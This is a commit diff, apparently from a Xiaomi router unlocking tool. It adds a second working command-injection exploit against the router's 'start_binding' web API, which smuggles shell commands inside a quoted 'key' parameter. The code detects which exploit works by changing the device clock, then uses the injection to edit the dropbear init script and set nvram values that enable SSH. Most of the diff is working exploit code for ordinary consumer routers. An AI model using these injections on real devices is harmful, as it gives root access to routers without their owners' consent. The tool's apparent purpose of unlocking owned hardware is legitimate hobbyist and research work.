[connect6] Add support new vulnerability into start_binding

pull/36/head
remittor 6 months ago
parent 06576f6a9d
commit 420b343402

@ -51,7 +51,8 @@ dn = gw.device_name
# import connect4
# sys.exit(0)
if dn in 'RD01 RD02 RD03 CR8818 RD04 RD05 RD06 CR8816 CR8819 RD08 ':
#if dn in 'RD01 RD02 RD03 CR8818 RD04 RD05 RD06 CR8816 CR8819 RD08 ':
if dn.startswith('RD') or dn.startswith('BE') or dn.startswith('CR88'):
import connect6
sys.exit(0)
@ -59,6 +60,8 @@ if gw.model_id <= 0 or gw.model_id >= gw.get_modelid_by_name('R2100'):
import connect5
sys.exit(0)
# ===============================================================================
print("device_name =", gw.device_name)
print("rom_version = {} {}".format(gw.rom_version, gw.rom_channel))
print("mac = {}".format(gw.mac_address))

@ -3,17 +3,12 @@
import os
import sys
import time
import requests
import xmir_base
from gateway import *
# Devices:
# RD01 FW ???
# RD02 FW ???
# RD03 FW ??? AX3000T
# RD08 FW ??? Xiaomi 6500 Pro
gw = Gateway(timeout = 4, detect_ssh = False)
if gw.status < 1:
@ -43,7 +38,9 @@ print(f'Current CountryCode = {ccode}')
stok = gw.web_login()
def exec_cmd(cmd = {}, api = 'misystem/arn_switch'):
def exploit_1(cmd = { }, api = 'misystem/arn_switch'):
# vuln/exploit author: ?????????
params = cmd
if isinstance(cmd, str):
cmd = cmd.replace(';', '\n')
@ -51,9 +48,46 @@ def exec_cmd(cmd = {}, api = 'misystem/arn_switch'):
res = requests.get(gw.apiurl + api, params = params)
return res.text
res = exec_cmd('logger hello_world_3335556_')
if '"code":0' not in res:
die('Exploit "arn_switch" not working!!!')
def exploit_2(cmd = { }, api = 'xqsystem/start_binding'):
# vuln/exploit author: ?????????
params = cmd
if isinstance(cmd, str):
cmd = cmd.replace(';', '\n')
params = { 'uid': 1234, 'key': "1234'\n" + cmd + "\n'" }
res = requests.get(gw.apiurl + api, params = params)
return res.text
# get device orig system time
dst = gw.get_device_systime()
exec_cmd = None
exp_list = [ exploit_2, exploit_1 ]
for exp_func in exp_list:
res = exp_func("date -s 203301020304")
#if '"code":0' not in res:
# continue
time.sleep(1.2)
dxt = gw.get_device_systime()
if dxt['year'] == 2033 and dxt['month'] == 1 and dxt['day'] == 2:
if dxt['hour'] == 3 and dxt['min'] == 4:
exec_cmd = exp_func
break
time.sleep(1)
# restore orig system time
time.sleep(1)
gw.set_device_systime(dst)
if not exec_cmd:
die('Exploits arn_switch/start_binding not working!!!')
if exec_cmd == exploit_1:
print('Exploit "arn_switch" detected!')
if exec_cmd == exploit_2:
print('Exploit "start_binding" detected!')
exec_cmd(r"sed -i 's/release/XXXXXX/g' /etc/init.d/dropbear")
exec_cmd(r"nvram set ssh_en=1 ; nvram set boot_wait=on ; nvram set bootdelay=3 ; nvram commit")

@ -274,6 +274,43 @@ class Gateway():
def get_topo_graph_info(self, timeout = 5):
return self.get_pub_info('topo_graph', timeout = timeout)
def get_device_systime(self, fix_tz = True):
# http://192.168.31.1/cgi-bin/luci/;stok=14b996378966455753104d187c1150b4/api/misystem/sys_time
# response: {"time":{"min":32,"day":4,"index":0,"month":10,"year":2023,"sec":7,"hour":6,"timezone":"XXX"},"code":0}
res = requests.get(self.apiurl + 'misystem/sys_time')
try:
dres = json.loads(res.text)
code = dres['code']
except Exception:
raise RuntimeError(f'Error on parse response for command "sys_time" => {res.text}')
if code != 0:
raise RuntimeError(f'Error on get sys_time => {res.text}')
dst = dres['time']
if fix_tz and 'timezone' in dst:
if "'" in dst['timezone'] or ";" in dst['timezone']:
dst['timezone'] = "GMT0"
return dst
def set_device_systime(self, dst, year = 0, month = 0, day = 0, hour = 0, min = 0, sec = 0, timezone = ""):
if dst:
year = dst['year']
month = dst['month']
day = dst['day']
hour = dst['hour']
min = dst['min']
sec = dst['sec']
timezone = dst['timezone']
params = { 'time': f"{year}-{month}-{day} {hour}:{min}:{sec}", 'timezone': timezone }
res = requests.get(self.apiurl + 'misystem/set_sys_time', params = params)
try:
dres = json.loads(res.text)
code = dres['code']
except Exception:
raise RuntimeError(f'Error on parse response for command "set_sys_time" => {res.text}')
if code != 0:
raise RuntimeError(f'Error on exec command "set_sys_time" => {res.text}')
return res.text
def wait_shutdown(self, timeout, verbose = 1):
if verbose:
print('Waiting for shutdown: ', end='', flush=True)

Loading…
Cancel
Save